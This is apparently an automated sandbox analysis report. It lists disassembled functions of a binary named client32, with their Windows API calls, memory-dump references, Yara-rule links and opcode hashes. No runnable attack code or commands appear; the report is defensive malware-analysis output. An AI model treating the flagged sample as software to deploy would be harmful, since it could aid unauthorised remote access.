                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3394196147-0
                                                                                                                                                    • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                                                                                    • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                                                                                    • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                                                                                    • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                                                                                    Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,1EF76653,00000000,00002710,00000001,11027140,1EF76653,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                                                                                    • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 110436DE
                                                                                                                                                    • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3558565530-0
                                                                                                                                                    • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                                                                                    • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                                                                                    • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                                                                                    • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                                                                                    Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                                                                                    • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$RectText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4034337308-0
                                                                                                                                                    • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                                                    • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                                                                                    • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                                                    • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                                                                                    Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32 ref: 110675BB
                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Peek$DispatchEvent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4257095537-0
                                                                                                                                                    • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                                                                                    • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                                                                                    • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                                                                                    • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                                                                                    Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AtomDeleteGlobal$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 964255742-0
                                                                                                                                                    • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                                                    • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                                                                    • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                                                    • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                                                                    Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                                                                                                    • SetFocus.USER32(?), ref: 11007403
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 1305092643-2167791130
                                                                                                                                                    • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                                                                                    • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                                                                                    • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                                                                                                    • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                                                                                    Function 6CA90DC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
                                                                                                                                                      • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 6CA90EEB
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 6CA90F00
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: PIN
                                                                                                                                                    • API String ID: 1338273076-589459321
                                                                                                                                                    • Opcode ID: 2bf39442b82258e71c14be8754ce83d554c24df6912f7205e0c7fd34f63aeba1
                                                                                                                                                    • Instruction ID: 2bee7cec8cc4ce0df8a7804de34dd1ffe59598e9cd93023ca10a9aaff1788a4e
                                                                                                                                                    • Opcode Fuzzy Hash: 2bf39442b82258e71c14be8754ce83d554c24df6912f7205e0c7fd34f63aeba1
                                                                                                                                                    • Instruction Fuzzy Hash: 21413CB1D10248AFDB04DFE8D9819EEBBF4FB49304F10462EE41AE7640EB345A89CB51
                                                                                                                                                    Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                                                                                    • _memmove.LIBCMT ref: 11009336
                                                                                                                                                      • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                    • String ID: string too long
                                                                                                                                                    • API String ID: 2168136238-2556327735
                                                                                                                                                    • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                                                                    • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                                                                                    • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                                                                    • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                                                                                    Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                    • String ID: string too long
                                                                                                                                                    • API String ID: 256744135-2556327735
                                                                                                                                                    • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                                                                    • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                                                                                    • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                                                                    • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                                                                                    Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _calloc.LIBCMT ref: 1103B162
                                                                                                                                                    • _free.LIBCMT ref: 1103B25B
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                                                                                    • String ID: CLTCONN.CPP
                                                                                                                                                    • API String ID: 183652615-2872349640
                                                                                                                                                    • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                                                                                    • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                                                                                    • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                                                                                    • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
